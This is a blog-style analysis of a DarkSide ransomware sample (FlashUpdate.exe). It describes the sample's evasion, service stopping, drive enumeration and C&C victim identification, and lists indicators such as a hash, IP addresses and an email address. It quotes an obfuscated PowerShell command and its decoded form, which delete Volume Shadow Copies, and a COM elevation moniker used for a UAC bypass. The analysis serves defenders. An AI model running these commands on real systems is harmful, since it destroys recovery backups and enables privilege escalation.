Skip to content

When the Hacker is Hacked!

DarkSide is a ransomware threat that has been in operation since at least August 2020 and was used in a cyberattack against Georgia-based Colonial Pipeline, leading to a significant fuel supply disruption along the East Coast of the US.

The malware is offered as Ransomware as A Service (RaaS) to different cybercriminals through an affiliate program. Like other prolific ransomware threats, it employs double extortion that combines file encryption with data theft and is deployed on compromised networks using manual hacking techniques.

Based on the initial analysis, it was identified that the threat actors behind DarkSide ransomware are of Russian origin and are likely former affiliates of the REvil RaaS group.”

Like any other well-constructed ransomware, DarkSide removes itself from the infected machine completely, so collecting its live samples was a little tricky. Still, using open/semi-open (deep web) threat sources and using techniques like self-deployed web-facing honeypots, I was able to collect 37 live samples of different variants of DarkSide ransomware. Unfortunately, some of them are still semi-detected or undetected by over 50 antivirus engines as of 05.15.2021.

The project was initiated using a “Blind Study” methodology, and a sample is selected. Details of the sample are below:

  • Filename: FlashUpdate.exe
  • Size: 2 MiB (2147296 bytes)
  • Type: “peexe” executable
  • Compression: UPX
  • Description: PE32 executable (GUI) Intel 80386, for MS Windows
  • Architecture: WINDOWS
  • HASH: SHA256: bafa2efff234303166d663f967037dae43701e7d63d914efc8c894b3e5be9408

These days, every sophisticated ransomware has a several security evasion techniques to bypass detection, so many of the defenses being recommended would be ineffective. Some of those techniques are:

1. Anti-Virtualization – A mechanism that will not allow the ransomware to execute if it can detect its running in a virtual environment. The ransomware does that using various techniques. One of the most common techniques is to read the MAC address of the network interface card, which discloses the system’s identity (virtual or physical).

2. Encrypted Source Code – Encrypting the source code and decoding it directly in the memory for execution.

3. Dynamic process calls and API hooking are some other techniques for the same purpose.

Here, to make static analysis harder, Darkside resolves DLLs and API calls dynamically using LoadLibrary, GetProcAddress, and two custom functions shown below. For example, in this screenshot, the address of _wcsicmp is resolved in memory.

The mutex (small piece of handler code responsible for specific work) “Global\\3e93e49583d6 401ba148cd68d1f84af7” is created to make sure only one copy of the ransomware is running; otherwise, the ransomware exits. This is done based on the name of the executable. Then “SetThreadExecutionState” is called to force the system to be working by resetting the system idle timer. This is required, so encrypt the files, even when the system is in the sleep / idle mode.

To ensure certain services are not running, the following services are stopped using the “ControlService – SERVICE_CONTROL_STOP” command and the “DeleteService” command. However, deleting a service is not helpful if an organization pays the ransom and wants to go back into production quickly. So DarkSider only stops them but keeps monitoring their status using a mutex so that the affected organization cant start them manually.

This is an interesting piece; to conduct all the work (like stopping services, encrypting files, deleting critical system data, etc.), DarkSide needs to get an elevated privilege (if executed by a USER, not an ADMINISTRATOR).

To achieve this, DarkSide is using an exploit technique created and used by the CIA (as per WikiLeaks, part of their “Vault 7: CIA Hacking Tools Revealed” leaks which is “Elevated COM Object UAC Bypass.”

The command used is:

“Elevation:Administrator!new:%s”

It takes ADMIN tokens from an administrative program and utilizes them for privilege escalation.

Shadow Copy (also known as Volume Snapshot Service, Volume Shadow Copy Service, or VSS) is a technology included in Microsoft Windows that can create backup copies or snapshots of computer files or volumes.

Using “CreateProcessW” the following Powershell script is executed, which deletes Shadow Volume Copies.

“powershell -ep bypass -c \”(0..61)|%{$s+=[char][byte](‘0x’+’4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20’.Substring(2*$_,2))};iex $s\””

After extracting this command, the code is obfuscated. After deobfuscating, I can see that this PowerShell command is used to delete Shadow Volume Copies on the machine before encrypting it.

“Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}”

An. ICO file is dropped in the “%APPDATA%” section, and a registry key is created.

All the running services of the system are enumerated and matched with these hardcoded service lists inside DarkSide ransomware.

  • VSS
  • SQL
  • svc$
  • memtas
  • mepocs
  • Sophos
  • veeam
  • backup

If any of these services are identified as running, they were terminated and deleted.

In this stage, all the drives of the infected systems are enumerated, and their types are identified. DarkSide conduct this enumeration by using “_GetDriveTypeW”, _GetFreeDiskSpaceW” and “drive_type_code” commands. This format of the output is “<Drive Name>:<Remaining Disk Space>/<Total Disk Space>.” For example, “C:30/50.”

The encryption mechanism consists of two major parts, which are the exclusions and the actual encryption routines. DarkSide excludes a couple of file directories. Some of them are:

The file encryption routine architecture is like this:

DarkSide is a C&C (command and control) based ransomware. That means it needs a constant internet connection for downloading execution dependencies, syncing public and private keys of encryption, and other similar works. Also, as it is a part of RaaS, it registers its victim with a unique identity so that the hacker can identify them from a list of victims.

Ransomware usually does this in the form of a unique URL counterpart generation process, and that counterpart will be the unique victim identified. For example, “www.abc.com/sd33kshdysteclsp”. Here abc.com will be the C&C domain operated by the hacker, and the “sd33kshdysteclsp” will be the unique victim identifier.

DarkSide follows the same process. After reverse-engineering the ransomware, a couple of important pieces of information was extracted. I was able to identify the C&C server domains but they are excluded from this report because if accessed they can distribute ransomware or Trojan downloaders.

The format of the Unique Victim identification generation process is DOMAIN/<URL Path Generator>

1. Email address identified: breathcojunktab1987@yahoo[.]com.

2. Contains PDB pathways: %USERPROFILE%\code\Squirrel\ Squirrel.Windows\src\ StubExecutable\bin\Release\StubExecutable.pdb”

  1. 3. Public Ip Identified: i. 185.105.109.19
  2. ii. 23.55.62.35
  3. 4. Program Digital Certificate details: After extracting and analyzing the digital certificate, the following information were extracted:

Conclusion

Ransomware-as-a-service democratizes ransomware attacks so that even unsophisticated bad actors can shut a business down. Even worse, many of the recommendations that we are seeing in the media for protecting a company from ransomware would not be effective based on the above. Updating your anti-virus is not enough.